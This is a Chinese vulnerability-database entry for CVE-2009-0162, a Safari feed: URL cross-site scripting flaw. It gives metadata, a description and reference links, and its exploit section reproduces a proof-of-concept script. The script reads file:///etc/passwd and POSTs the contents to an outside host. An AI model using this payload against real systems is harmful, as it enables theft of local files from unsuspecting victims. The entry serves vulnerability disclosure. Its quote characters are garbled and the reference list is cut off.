Apple Safari跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117750 漏洞类型 跨站脚本
发布时间 2009-05-12 更新时间 2009-06-10
CVE编号 CVE-2009-0162 CNNVD-ID CNNVD-200905-177
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32994
https://www.securityfocus.com/bid/34925
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-177
|漏洞详情
Safari是苹果操作系统中所默认捆绑的WEB浏览器。Safari中WebKit处理SVGList对象时存在内存破坏漏洞,访问恶意网站就会导致执行任意代码。Safari处理feed:URL中存在多个输入验证错误,访问恶意的feed:URL就会导致执行任意JavaScript。
|漏洞EXP
source: http://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>
|受影响的产品
Apple Safari 3.2.2 for Windows Apple Safari 3.1.2 for Windows Apple Safari 3.1.2 Apple Safari 3.1.1 for Windows Apple Safari 3.1.1 Apple Safari 3.0.4 Beta for Windows
|参考资料

来源:US-CERT
名称:TA09-133A
链接:http://www.us-cert.gov/cas/techalerts/TA09-133A.html
来源:support.apple.com
链接:http://support.apple.com/kb/HT3549
来源:APPLE
名称:APPLE-SA-2009-05-12
链接:http://lists.apple.com/archives/security-announce/2009/May/msg00002.html
来源:APPLE
名称:APPLE-SA-2009-05-12
链接:http://lists.apple.com/archives/security-announce/2009/May/msg00001.html
来源:APPLE
名称:APPLE-SA-2009-05-12
链接:http://lists.apple.com/archives/security-announce/2009/May/msg00000.html
来源:XF
名称:safari-feedurl-code-execution(50476)
链接:http://xforce.iss.net/xforce/xfdb/50476
来源:VUPEN
名称:ADV-2009-1298
链接:http://www.vupen.com/english/advisories/2009/1298
来源:VUPEN
名称:ADV-2009-1297
链接:http://www.vupen.com/english/advisories/2009/1297
来源:SECTRACK
名称:1022206
链接:http://www.securitytracker.com/id?1022206
来源:BID
名称:34925
链接:http://www.securityfocus.com/bid/34925
来源:support.apple.com
链接:http://support.apple.com/kb/HT3550
来源:SECUNIA
名称:35074
链接:http://secunia.com/advisories/35074
来源:SECUNIA
名称:35056
链接:http://secunia.com/adv